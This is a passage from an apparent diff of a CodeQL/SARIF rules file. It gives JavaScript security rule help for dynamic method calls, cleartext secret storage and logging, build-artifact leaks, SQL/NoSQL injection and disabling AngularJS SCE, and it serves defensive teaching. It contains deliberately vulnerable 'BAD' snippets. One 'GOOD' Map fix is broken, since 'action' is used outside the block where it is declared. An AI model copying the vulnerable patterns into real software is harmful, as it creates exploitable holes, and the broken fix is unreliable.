If, for example, `action` is `rewind`, `action` will be `undefined` and the call will result in a runtime error.\n\nThe easiest way to prevent this is to turn `actions` into a `Map` and using `Map.prototype.has` to check whether the method name is valid before looking it up.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = new Map();\nactions.set(\"play\", function play(data) {\n // ...\n});\nactions.set(\"pause\", function pause(data) {\n // ...\n});\n\napp.get('/perform/:action/:payload', function(req, res) {\n if (actions.has(req.params.action)) {\n if (typeof actions.get(req.params.action) === 'function'){\n let action = actions.get(req.params.action);\n }\n // GOOD: `action` is either the `play` or the `pause` function from above\n res.end(action(req.params.payload));\n } else {\n res.end(\"Unsupported action.\");\n }\n});\n\n```\nIf `actions` cannot be turned into a `Map`, a `hasOwnProperty` check should be added to validate the method name:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = {\n play(data) {\n // ...\n },\n pause(data) {\n // ...\n }\n}\n\napp.get('/perform/:action/:payload', function(req, res) {\n if (actions.hasOwnProperty(req.params.action)) {\n let action = actions[req.params.action];\n if (typeof action === 'function') {\n // GOOD: `action` is an own method of `actions`\n res.end(action(req.params.payload));\n return;\n }\n }\n res.end(\"Unsupported action.\");\n});\n\n```\n\n## References\n* OWASP: [Denial of Service](https://www.owasp.org/index.php/Denial_of_Service).\n* MDN: [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map).\n* MDN: [Object.prototype](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/prototype).\n* Common Weakness Enumeration: [CWE-754](https://cwe.mitre.org/data/definitions/754.html).\n", + "markdown" : "# Unvalidated dynamic method call\nJavaScript 
makes it easy to look up object properties dynamically at runtime. In particular, methods can be looked up by name and then called. However, if the method name is user-controlled, an attacker could choose a name that makes the application invoke an unexpected method, which may cause a runtime exception. If this exception is not handled, it could be used to mount a denial-of-service attack.\n\nFor example, there might not be a method of the given name, or the result of the lookup might not be a function. In either case the method call will throw a `TypeError` at runtime.\n\nAnother, more subtle example is where the result of the lookup is a standard library method from `Object.prototype`, which most objects have on their prototype chain. Examples of such methods include `valueOf`, `hasOwnProperty` and `__defineSetter__`. If the method call passes the wrong number or kind of arguments to these methods, they will throw an exception.\n\n\n## Recommendation\nIt is best to avoid dynamic method lookup involving user-controlled names altogether, for instance by using a `Map` instead of a plain object.\n\nIf the dynamic method lookup cannot be avoided, consider whitelisting permitted method names. At the very least, check that the method is an own property and not inherited from the prototype object. If the object on which the method is looked up contains properties that are not methods, you should additionally check that the result of the lookup is a function. 
Even if the object only contains methods, it is still a good idea to perform this check in case other properties are added to the object later on.\n\n\n## Example\nIn the following example, an HTTP request parameter `action` property is used to dynamically look up a function in the `actions` map, which is then invoked with the `payload` parameter as its argument.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = {\n play(data) {\n // ...\n },\n pause(data) {\n // ...\n }\n}\n\napp.get('/perform/:action/:payload', function(req, res) {\n let action = actions[req.params.action];\n // BAD: `action` may not be a function\n res.end(action(req.params.payload));\n});\n\n```\nThe intention is to allow clients to invoke the `play` or `pause` method, but there is no check that `action` is actually the name of a method stored in `actions`. If, for example, `action` is `rewind`, `action` will be `undefined` and the call will result in a runtime error.\n\nThe easiest way to prevent this is to turn `actions` into a `Map` and using `Map.prototype.has` to check whether the method name is valid before looking it up.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = new Map();\nactions.set(\"play\", function play(data) {\n // ...\n});\nactions.set(\"pause\", function pause(data) {\n // ...\n});\n\napp.get('/perform/:action/:payload', function(req, res) {\n if (actions.has(req.params.action)) {\n if (typeof actions.get(req.params.action) === 'function'){\n let action = actions.get(req.params.action);\n }\n // GOOD: `action` is either the `play` or the `pause` function from above\n res.end(action(req.params.payload));\n } else {\n res.end(\"Unsupported action.\");\n }\n});\n\n```\nIf `actions` cannot be turned into a `Map`, a `hasOwnProperty` check should be added to validate the method name:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = {\n play(data) 
{\n // ...\n },\n pause(data) {\n // ...\n }\n}\n\napp.get('/perform/:action/:payload', function(req, res) {\n if (actions.hasOwnProperty(req.params.action)) {\n let action = actions[req.params.action];\n if (typeof action === 'function') {\n // GOOD: `action` is an own method of `actions`\n res.end(action(req.params.payload));\n return;\n }\n }\n res.end(\"Unsupported action.\");\n});\n\n```\n\n## References\n* OWASP: [Denial of Service](https://www.owasp.org/index.php/Denial_of_Service).\n* MDN: [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map).\n* MDN: [Object.prototype](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/prototype).\n* Common Weakness Enumeration: [CWE-754](https://cwe.mitre.org/data/definitions/754.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-754" ], + "description" : "Calling a method with a user-controlled name may dispatch to\n an unexpected target, which could cause an exception.", + "id" : "js/unvalidated-dynamic-method-call", + "kind" : "path-problem", + "name" : "Unvalidated dynamic method call", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/clear-text-storage-of-sensitive-data", + "name" : "js/clear-text-storage-of-sensitive-data", + "shortDescription" : { + "text" : "Clear text storage of sensitive information" + }, + "fullDescription" : { + "text" : "Sensitive information stored without encryption or hashing can expose it to an attacker." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Clear text storage of sensitive information\nSensitive information that is stored unencrypted is accessible to an attacker who gains access to the storage. 
This is particularly important for cookies, which are stored on the machine of the end-user.\n\n\n## Recommendation\nEnsure that sensitive information is always encrypted before being stored. If possible, avoid placing sensitive information in cookies altogether. Instead, prefer storing, in the cookie, a key that can be used to look up the sensitive information.\n\nIn general, decrypt sensitive information only at the point where it is necessary for it to be used in cleartext.\n\nBe aware that external processes often store the `standard out` and `standard error` streams of the application, causing logged sensitive information to be stored as well.\n\n\n## Example\nThe following example code stores user credentials (in this case, their password) in a cookie in plain text:\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\napp.get('/remember-password', function (req, res) {\n let pw = req.param(\"current_password\");\n // BAD: Setting a cookie value with cleartext sensitive data.\n res.cookie(\"password\", pw);\n});\n\n```\nInstead, the credentials should be encrypted, for instance by using the Node.js `crypto` module:\n\n\n```javascript\nvar express = require('express');\nvar crypto = require('crypto'),\n password = getPassword();\n\nfunction encrypt(text){\n var cipher = crypto.createCipher('aes-256-ctr', password);\n return cipher.update(text, 'utf8', 'hex') + cipher.final('hex');\n}\n\nvar app = express();\napp.get('/remember-password', function (req, res) {\n let pw = req.param(\"current_password\");\n // GOOD: Encoding the value before setting it.\n res.cookie(\"password\", encrypt(pw));\n});\n\n```\n\n## References\n* M. Dowd, J. McDonald and J. Schuhm, *The Art of Software Security Assessment*, 1st Edition, Chapter 2 - 'Common Vulnerabilities of Encryption', p. 43. Addison Wesley, 2006.\n* M. Howard and D. LeBlanc, *Writing Secure Code*, 2nd Edition, Chapter 9 - 'Protecting Secret Data', p. 299. 
Microsoft, 2002.\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-315](https://cwe.mitre.org/data/definitions/315.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n", + "markdown" : "# Clear text storage of sensitive information\nSensitive information that is stored unencrypted is accessible to an attacker who gains access to the storage. This is particularly important for cookies, which are stored on the machine of the end-user.\n\n\n## Recommendation\nEnsure that sensitive information is always encrypted before being stored. If possible, avoid placing sensitive information in cookies altogether. Instead, prefer storing, in the cookie, a key that can be used to look up the sensitive information.\n\nIn general, decrypt sensitive information only at the point where it is necessary for it to be used in cleartext.\n\nBe aware that external processes often store the `standard out` and `standard error` streams of the application, causing logged sensitive information to be stored as well.\n\n\n## Example\nThe following example code stores user credentials (in this case, their password) in a cookie in plain text:\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\napp.get('/remember-password', function (req, res) {\n let pw = req.param(\"current_password\");\n // BAD: Setting a cookie value with cleartext sensitive data.\n res.cookie(\"password\", pw);\n});\n\n```\nInstead, the credentials should be encrypted, for instance by using the Node.js `crypto` module:\n\n\n```javascript\nvar express = require('express');\nvar crypto = require('crypto'),\n password = getPassword();\n\nfunction encrypt(text){\n var cipher = crypto.createCipher('aes-256-ctr', password);\n return cipher.update(text, 'utf8', 'hex') + cipher.final('hex');\n}\n\nvar app = express();\napp.get('/remember-password', function (req, res) {\n let pw = 
req.param(\"current_password\");\n // GOOD: Encoding the value before setting it.\n res.cookie(\"password\", encrypt(pw));\n});\n\n```\n\n## References\n* M. Dowd, J. McDonald and J. Schuhm, *The Art of Software Security Assessment*, 1st Edition, Chapter 2 - 'Common Vulnerabilities of Encryption', p. 43. Addison Wesley, 2006.\n* M. Howard and D. LeBlanc, *Writing Secure Code*, 2nd Edition, Chapter 9 - 'Protecting Secret Data', p. 299. Microsoft, 2002.\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-315](https://cwe.mitre.org/data/definitions/315.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-312", "external/cwe/cwe-315", "external/cwe/cwe-359" ], + "description" : "Sensitive information stored without encryption or hashing can expose it to an\n attacker.", + "id" : "js/clear-text-storage-of-sensitive-data", + "kind" : "path-problem", + "name" : "Clear text storage of sensitive information", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "7.5" + } + }, { + "id" : "js/clear-text-logging", + "name" : "js/clear-text-logging", + "shortDescription" : { + "text" : "Clear-text logging of sensitive information" + }, + "fullDescription" : { + "text" : "Logging sensitive information without encryption or hashing can expose it to an attacker." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Clear-text logging of sensitive information\nIf sensitive data is written to a log entry it could be exposed to an attacker who gains access to the logs.\n\nPotential attackers can obtain sensitive user data when the log output is displayed. 
Additionally that data may expose system information such as full path names, system information, and sometimes usernames and passwords.\n\n\n## Recommendation\nSensitive data should not be logged.\n\n\n## Example\nIn the example the entire process environment is logged using \\`console.info\\`. Regular users of the production deployed application should not have access to this much information about the environment configuration.\n\n\n```javascript\n// BAD: Logging cleartext sensitive data\nconsole.info(`[INFO] Environment: ${process.env}`);\n```\nIn the second example the data that is logged is not sensitive.\n\n\n```javascript\nlet not_sensitive_data = { a: 1, b : 2} \n// GOOD: it is fine to log data that is not sensitive\nconsole.info(`[INFO] Some object contains: ${not_sensitive_data}`);\n```\n\n## References\n* OWASP: [Insertion of Sensitive Information into Log File](https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n* Common Weakness Enumeration: [CWE-532](https://cwe.mitre.org/data/definitions/532.html).\n", + "markdown" : "# Clear-text logging of sensitive information\nIf sensitive data is written to a log entry it could be exposed to an attacker who gains access to the logs.\n\nPotential attackers can obtain sensitive user data when the log output is displayed. Additionally that data may expose system information such as full path names, system information, and sometimes usernames and passwords.\n\n\n## Recommendation\nSensitive data should not be logged.\n\n\n## Example\nIn the example the entire process environment is logged using \\`console.info\\`. 
Regular users of the production deployed application should not have access to this much information about the environment configuration.\n\n\n```javascript\n// BAD: Logging cleartext sensitive data\nconsole.info(`[INFO] Environment: ${process.env}`);\n```\nIn the second example the data that is logged is not sensitive.\n\n\n```javascript\nlet not_sensitive_data = { a: 1, b : 2} \n// GOOD: it is fine to log data that is not sensitive\nconsole.info(`[INFO] Some object contains: ${not_sensitive_data}`);\n```\n\n## References\n* OWASP: [Insertion of Sensitive Information into Log File](https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n* Common Weakness Enumeration: [CWE-532](https://cwe.mitre.org/data/definitions/532.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-312", "external/cwe/cwe-359", "external/cwe/cwe-532" ], + "description" : "Logging sensitive information without encryption or hashing can\n expose it to an attacker.", + "id" : "js/clear-text-logging", + "kind" : "path-problem", + "name" : "Clear-text logging of sensitive information", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "7.5" + } + }, { + "id" : "js/build-artifact-leak", + "name" : "js/build-artifact-leak", + "shortDescription" : { + "text" : "Storage of sensitive information in build artifact" + }, + "fullDescription" : { + "text" : "Including sensitive information in a build artifact can expose it to an attacker." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Storage of sensitive information in build artifact\nSensitive information included in a build artifact can allow an attacker to access the sensitive information if the artifact is published.\n\n\n## Recommendation\nOnly store information that is meant to be publicly available in a build artifact.\n\n\n## Example\nThe following example creates a `webpack` configuration that inserts all environment variables from the host into the build artifact:\n\n\n```javascript\nconst webpack = require(\"webpack\");\n\nmodule.exports = [{\n plugins: [\n new webpack.DefinePlugin({\n \"process.env\": JSON.stringify(process.env)\n })\n ]\n}];\n```\nThe environment variables might include API keys or other sensitive information, and the build-system should instead insert only the environment variables that are supposed to be public.\n\nThe issue has been fixed below, where only the `DEBUG` environment variable is inserted into the artifact.\n\n\n```javascript\nconst webpack = require(\"webpack\");\n\nmodule.exports = [{\n plugins: [\n new webpack.DefinePlugin({\n 'process.env': JSON.stringify({ DEBUG: process.env.DEBUG })\n })\n ]\n}];\n\n```\n\n## References\n* webpack: [DefinePlugin API](https://webpack.js.org/plugins/define-plugin/).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-315](https://cwe.mitre.org/data/definitions/315.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n", + "markdown" : "# Storage of sensitive information in build artifact\nSensitive information included in a build artifact can allow an attacker to access the sensitive information if the artifact is published.\n\n\n## Recommendation\nOnly store information that is meant to be publicly available in a build artifact.\n\n\n## Example\nThe following example creates a `webpack` 
configuration that inserts all environment variables from the host into the build artifact:\n\n\n```javascript\nconst webpack = require(\"webpack\");\n\nmodule.exports = [{\n plugins: [\n new webpack.DefinePlugin({\n \"process.env\": JSON.stringify(process.env)\n })\n ]\n}];\n```\nThe environment variables might include API keys or other sensitive information, and the build-system should instead insert only the environment variables that are supposed to be public.\n\nThe issue has been fixed below, where only the `DEBUG` environment variable is inserted into the artifact.\n\n\n```javascript\nconst webpack = require(\"webpack\");\n\nmodule.exports = [{\n plugins: [\n new webpack.DefinePlugin({\n 'process.env': JSON.stringify({ DEBUG: process.env.DEBUG })\n })\n ]\n}];\n\n```\n\n## References\n* webpack: [DefinePlugin API](https://webpack.js.org/plugins/define-plugin/).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-315](https://cwe.mitre.org/data/definitions/315.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-312", "external/cwe/cwe-315", "external/cwe/cwe-359" ], + "description" : "Including sensitive information in a build artifact can\n expose it to an attacker.", + "id" : "js/build-artifact-leak", + "kind" : "path-problem", + "name" : "Storage of sensitive information in build artifact", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "7.5" + } + }, { + "id" : "js/sql-injection", + "name" : "js/sql-injection", + "shortDescription" : { + "text" : "Database query built from user-controlled sources" + }, + "fullDescription" : { + "text" : "Building a database query from user-controlled sources is vulnerable to insertion of malicious code by the user." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Database query built from user-controlled sources\nIf a database query (such as a SQL or NoSQL query) is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries.\n\n\n## Recommendation\nMost database connector libraries offer a way of safely embedding untrusted data into a query by means of query parameters or prepared statements.\n\nFor NoSQL queries, make use of an operator like MongoDB's `$eq` to ensure that untrusted data is interpreted as a literal value and not as a query object. Alternatively, check that the untrusted data is a literal value and not a query object before using it in a query.\n\nFor SQL queries, use query parameters or prepared statements to embed untrusted data into the query string, or use a library like `sqlstring` to escape untrusted data.\n\n\n## Example\nIn the following example, assume the function `handler` is an HTTP request handler in a web application, whose parameter `req` contains the request object.\n\nThe handler constructs an SQL query string from user input and executes it as a database query using the `pg` library. The user input may contain quote characters, so this code is vulnerable to a SQL injection attack.\n\n\n```javascript\nconst app = require(\"express\")(),\n pg = require(\"pg\"),\n pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n // BAD: the category might have SQL special characters in it\n var query1 =\n \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='\" +\n req.params.category +\n \"' ORDER BY PRICE\";\n pool.query(query1, [], function(err, results) {\n // process results\n });\n});\n\n```\nTo fix this vulnerability, we can use query parameters to embed the user input into the query string. 
In this example, we use the API offered by the `pg` Postgres database connector library, but other libraries offer similar features. This version is immune to injection attacks.\n\n\n```javascript\nconst app = require(\"express\")(),\n pg = require(\"pg\"),\n pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n // GOOD: use parameters\n var query2 =\n \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE\";\n pool.query(query2, [req.params.category], function(err, results) {\n // process results\n });\n});\n\n```\nAlternatively, we can use a library like `sqlstring` to escape the user input before embedding it into the query string:\n\n\n```javascript\nconst app = require(\"express\")(),\n pg = require(\"pg\"),\n SqlString = require('sqlstring'),\n pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n // GOOD: the category is escaped using mysql.escape\n var query1 =\n \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='\" +\n SqlString.escape(req.params.category) +\n \"' ORDER BY PRICE\";\n pool.query(query1, [], function(err, results) {\n // process results\n });\n});\n\n```\n\n## Example\nIn the following example, an express handler attempts to delete a single document from a MongoDB collection. The document to be deleted is identified by its `_id` field, which is constructed from user input. 
The user input may contain a query object, so this code is vulnerable to a NoSQL injection attack.\n\n\n```javascript\nconst express = require(\"express\");\nconst mongoose = require(\"mongoose\");\nconst Todo = mongoose.model(\n \"Todo\",\n new mongoose.Schema({ text: { type: String } }, { timestamps: true })\n);\n\nconst app = express();\napp.use(express.json());\napp.use(express.urlencoded({ extended: false }));\n\napp.delete(\"/api/delete\", async (req, res) => {\n let id = req.body.id;\n\n await Todo.deleteOne({ _id: id }); // BAD: id might be an object with special properties\n\n res.json({ status: \"ok\" });\n});\n\n```\nTo fix this vulnerability, we can use the `$eq` operator to ensure that the user input is interpreted as a literal value and not as a query object:\n\n\n```javascript\napp.delete(\"/api/delete\", async (req, res) => {\n let id = req.body.id;\n await Todo.deleteOne({ _id: { $eq: id } }); // GOOD: using $eq operator for the comparison\n\n res.json({ status: \"ok\" });\n});\n```\nAlternatively check that the user input is a literal value and not a query object before using it:\n\n\n```javascript\napp.delete(\"/api/delete\", async (req, res) => {\n let id = req.body.id;\n if (typeof id !== \"string\") {\n res.status(400).json({ status: \"error\" });\n return;\n }\n await Todo.deleteOne({ _id: id }); // GOOD: id is guaranteed to be a string\n\n res.json({ status: \"ok\" });\n});\n\n```\n\n## References\n* Wikipedia: [SQL injection](https://en.wikipedia.org/wiki/SQL_injection).\n* MongoDB: [$eq operator](https://docs.mongodb.com/manual/reference/operator/query/eq).\n* OWASP: [NoSQL injection](https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf).\n* Common Weakness Enumeration: [CWE-89](https://cwe.mitre.org/data/definitions/89.html).\n* Common Weakness Enumeration: [CWE-90](https://cwe.mitre.org/data/definitions/90.html).\n* Common Weakness Enumeration: [CWE-943](https://cwe.mitre.org/data/definitions/943.html).\n", + "markdown" : "# Database query 
built from user-controlled sources\nIf a database query (such as a SQL or NoSQL query) is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries.\n\n\n## Recommendation\nMost database connector libraries offer a way of safely embedding untrusted data into a query by means of query parameters or prepared statements.\n\nFor NoSQL queries, make use of an operator like MongoDB's `$eq` to ensure that untrusted data is interpreted as a literal value and not as a query object. Alternatively, check that the untrusted data is a literal value and not a query object before using it in a query.\n\nFor SQL queries, use query parameters or prepared statements to embed untrusted data into the query string, or use a library like `sqlstring` to escape untrusted data.\n\n\n## Example\nIn the following example, assume the function `handler` is an HTTP request handler in a web application, whose parameter `req` contains the request object.\n\nThe handler constructs an SQL query string from user input and executes it as a database query using the `pg` library. The user input may contain quote characters, so this code is vulnerable to a SQL injection attack.\n\n\n```javascript\nconst app = require(\"express\")(),\n pg = require(\"pg\"),\n pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n // BAD: the category might have SQL special characters in it\n var query1 =\n \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='\" +\n req.params.category +\n \"' ORDER BY PRICE\";\n pool.query(query1, [], function(err, results) {\n // process results\n });\n});\n\n```\nTo fix this vulnerability, we can use query parameters to embed the user input into the query string. In this example, we use the API offered by the `pg` Postgres database connector library, but other libraries offer similar features. 
This version is immune to injection attacks.\n\n\n```javascript\nconst app = require(\"express\")(),\n pg = require(\"pg\"),\n pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n // GOOD: use parameters\n var query2 =\n \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE\";\n pool.query(query2, [req.params.category], function(err, results) {\n // process results\n });\n});\n\n```\nAlternatively, we can use a library like `sqlstring` to escape the user input before embedding it into the query string:\n\n\n```javascript\nconst app = require(\"express\")(),\n pg = require(\"pg\"),\n SqlString = require('sqlstring'),\n pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n // GOOD: the category is escaped using mysql.escape\n var query1 =\n \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='\" +\n SqlString.escape(req.params.category) +\n \"' ORDER BY PRICE\";\n pool.query(query1, [], function(err, results) {\n // process results\n });\n});\n\n```\n\n## Example\nIn the following example, an express handler attempts to delete a single document from a MongoDB collection. The document to be deleted is identified by its `_id` field, which is constructed from user input. 
The user input may contain a query object, so this code is vulnerable to a NoSQL injection attack.\n\n\n```javascript\nconst express = require(\"express\");\nconst mongoose = require(\"mongoose\");\nconst Todo = mongoose.model(\n \"Todo\",\n new mongoose.Schema({ text: { type: String } }, { timestamps: true })\n);\n\nconst app = express();\napp.use(express.json());\napp.use(express.urlencoded({ extended: false }));\n\napp.delete(\"/api/delete\", async (req, res) => {\n let id = req.body.id;\n\n await Todo.deleteOne({ _id: id }); // BAD: id might be an object with special properties\n\n res.json({ status: \"ok\" });\n});\n\n```\nTo fix this vulnerability, we can use the `$eq` operator to ensure that the user input is interpreted as a literal value and not as a query object:\n\n\n```javascript\napp.delete(\"/api/delete\", async (req, res) => {\n let id = req.body.id;\n await Todo.deleteOne({ _id: { $eq: id } }); // GOOD: using $eq operator for the comparison\n\n res.json({ status: \"ok\" });\n});\n```\nAlternatively check that the user input is a literal value and not a query object before using it:\n\n\n```javascript\napp.delete(\"/api/delete\", async (req, res) => {\n let id = req.body.id;\n if (typeof id !== \"string\") {\n res.status(400).json({ status: \"error\" });\n return;\n }\n await Todo.deleteOne({ _id: id }); // GOOD: id is guaranteed to be a string\n\n res.json({ status: \"ok\" });\n});\n\n```\n\n## References\n* Wikipedia: [SQL injection](https://en.wikipedia.org/wiki/SQL_injection).\n* MongoDB: [$eq operator](https://docs.mongodb.com/manual/reference/operator/query/eq).\n* OWASP: [NoSQL injection](https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf).\n* Common Weakness Enumeration: [CWE-89](https://cwe.mitre.org/data/definitions/89.html).\n* Common Weakness Enumeration: [CWE-90](https://cwe.mitre.org/data/definitions/90.html).\n* Common Weakness Enumeration: [CWE-943](https://cwe.mitre.org/data/definitions/943.html).\n" + }, + "properties" : { + "tags" : 
[ "security", "external/cwe/cwe-089", "external/cwe/cwe-090", "external/cwe/cwe-943" ], + "description" : "Building a database query from user-controlled sources is vulnerable to insertion of\n malicious code by the user.", + "id" : "js/sql-injection", + "kind" : "path-problem", + "name" : "Database query built from user-controlled sources", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "8.8" + } + }, { + "id" : "js/angular/disabling-sce", + "name" : "js/angular/disabling-sce", + "shortDescription" : { + "text" : "Disabling SCE" + }, + "fullDescription" : { + "text" : "Disabling strict contextual escaping (SCE) can cause security vulnerabilities." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Disabling SCE\nAngularJS is secure by default through automated sanitization and filtering of untrusted values that could cause vulnerabilities such as XSS. Strict Contextual Escaping (SCE) is an execution mode in AngularJS that provides this security mechanism.\n\nDisabling SCE in an AngularJS application is strongly discouraged. It is even more discouraged to disable SCE in a library, since it is an application-wide setting.\n\n\n## Recommendation\nDo not disable SCE.\n\n\n## Example\nThe following example shows an AngularJS application that disables SCE in order to dynamically construct an HTML fragment, which is later inserted into the DOM through `$scope.html`.\n\n\n```javascript\nangular.module('app', [])\n .config(function($sceProvider) {\n $sceProvider.enabled(false); // BAD\n }).controller('controller', function($scope) {\n // ...\n $scope.html = '
  • ' + item.toString() + '
';\n });\n\n```\nThis is problematic, since it disables SCE for the entire AngularJS application.\n\nInstead, just mark the dynamically constructed HTML fragment as safe using `$sce.trustAsHtml`, before assigning it to `$scope.html`:\n\n\n```javascript\nangular.module('app', [])\n .controller('controller', function($scope, $sce) {\n // ...\n // GOOD (but should use the templating system instead)\n $scope.html = $sce.trustAsHtml('
  • ' + item.toString() + '
'); \n });\n\n```\nPlease note that this example is for illustrative purposes only; use the AngularJS templating system to dynamically construct HTML when possible.\n\n\n## References\n* AngularJS Developer Guide: [Strict Contextual Escaping](https://docs.angularjs.org/api/ng/service/$sce)\n* AngularJS Developer Guide: [Can I disable SCE completely?](https://docs.angularjs.org/api/ng/service/$sce#can-i-disable-sce-completely-).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Disabling SCE\nAngularJS is secure by default through automated sanitization and filtering of untrusted values that could cause vulnerabilities such as XSS. Strict Contextual Escaping (SCE) is an execution mode in AngularJS that provides this security mechanism.\n\nDisabling SCE in an AngularJS application is strongly discouraged. It is even more discouraged to disable SCE in a library, since it is an application-wide setting.\n\n\n## Recommendation\nDo not disable SCE.\n\n\n## Example\nThe following example shows an AngularJS application that disables SCE in order to dynamically construct an HTML fragment, which is later inserted into the DOM through `$scope.html`.\n\n\n```javascript\nangular.module('app', [])\n .config(function($sceProvider) {\n $sceProvider.enabled(false); // BAD\n }).controller('controller', function($scope) {\n // ...\n $scope.html = '
  • ' + item.toString() + '
';\n });\n\n```\nThis is problematic, since it disables SCE for the entire AngularJS application.\n\nInstead, just mark the dynamically constructed HTML fragment as safe using `$sce.trustAsHtml`, before assigning it to `$scope.html`:\n\n\n```javascript\nangular.module('app', [])\n .controller('controller', function($scope, $sce) {\n // ...\n // GOOD (but should use the templating system instead)\n $scope.html = $sce.trustAsHtml('
  • ' + item.toString() + '
'); \n });\n\n```\nPlease note that this example is for illustrative purposes only; use the AngularJS templating system to dynamically construct HTML when possible.\n\n\n## References\n* AngularJS Developer Guide: [Strict Contextual Escaping](https://docs.angularjs.org/api/ng/service/$sce)\n* AngularJS Developer Guide: [Can I disable SCE completely?](https://docs.angularjs.org/api/ng/service/$sce#can-i-disable-sce-completely-).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "maintainability", "frameworks/angularjs", "external/cwe/cwe-116" ], + "description" : "Disabling strict contextual escaping (SCE) can cause security vulnerabilities.", + "id" : "js/angular/disabling-sce", + "kind" : "problem", + "name" : "Disabling SCE", + "precision" : "very-high", + "problem.severity" : "warning", + "security-severity" : "7.8" + } + }, { + "id" : "js/angular/double-compilation", + "name" : "js/angular/double-compilation", + "shortDescription" : { + "text" : "Double compilation" + }, + "fullDescription" : { + "text" : "Recompiling an already compiled part of the DOM can lead to unexpected behavior of directives, performance problems, and memory leaks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Double compilation\nThe AngularJS compiler processes (parts of) the DOM, determining which directives match which DOM elements, and then applies the directives to the elements. 
